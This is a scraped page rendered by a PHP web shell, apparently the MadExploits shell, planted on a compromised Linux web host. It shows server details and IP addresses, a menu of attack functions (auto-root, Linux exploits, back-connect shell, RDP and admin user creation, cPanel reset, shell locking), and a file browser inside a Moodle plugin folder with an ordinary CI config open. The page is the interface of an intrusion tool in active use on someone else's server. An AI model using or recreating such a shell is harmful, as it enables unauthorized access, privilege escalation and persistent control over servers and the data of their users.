Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
report /
coursecompletion /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.travis.yml
867
B
-rw-r--r--
README.md
2.06
KB
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
index.php
13.68
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
settings.php
1.08
KB
-rw-r--r--
version.php
982
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php addons: postgresql: "9.5" services: - mysql - postgresql - docker cache: directories: - $HOME/.composer/cache - $HOME/.npm php: - 7.4 env: global: - MOODLE_BRANCH=MOODLE_39_STABLE - MOODLE_BRANCH=master matrix: - DB=pgsql - DB=mysqli before_install: - phpenv config-rm xdebug.ini - cd ../.. - composer create-project -n --no-dev --prefer-dist moodlehq/moodle-plugin-ci ci ^3 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" install: - moodle-plugin-ci install script: - moodle-plugin-ci phplint - moodle-plugin-ci phpcpd - moodle-plugin-ci phpmd - moodle-plugin-ci codechecker - moodle-plugin-ci validate - moodle-plugin-ci savepoints - moodle-plugin-ci mustache - moodle-plugin-ci grunt - moodle-plugin-ci phpdoc - moodle-plugin-ci phpunit - moodle-plugin-ci behat
Close